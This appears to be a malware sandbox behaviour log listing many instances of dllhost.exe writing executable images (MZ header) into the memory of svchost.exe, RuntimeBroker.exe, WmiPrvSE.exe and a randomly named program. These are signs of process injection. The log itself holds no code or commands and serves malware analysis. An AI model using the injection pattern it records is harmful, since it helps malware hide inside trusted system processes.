Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F560310000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 195E2560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C4C590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C4C5C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18DCC7D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 18DCCA00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14D83F10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14D83F40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B927020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1B927050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE31080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2DE310B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1270000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 12D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 6F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 15D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1420000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 5B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 700000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1210000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: C00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: A00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1450000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 790000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 280000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 10F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: BA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1170000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 380000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 2C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 13C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 11A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1220000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 360000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 810000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: 14A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files (x86)\NpQfZdGNyTRCKTdURvmufaFehFfnKXEVklaygxbefeAyJp\FgfDylvJCRIXMfsLfzr.exe base: D50000 value starts with: 4D5A
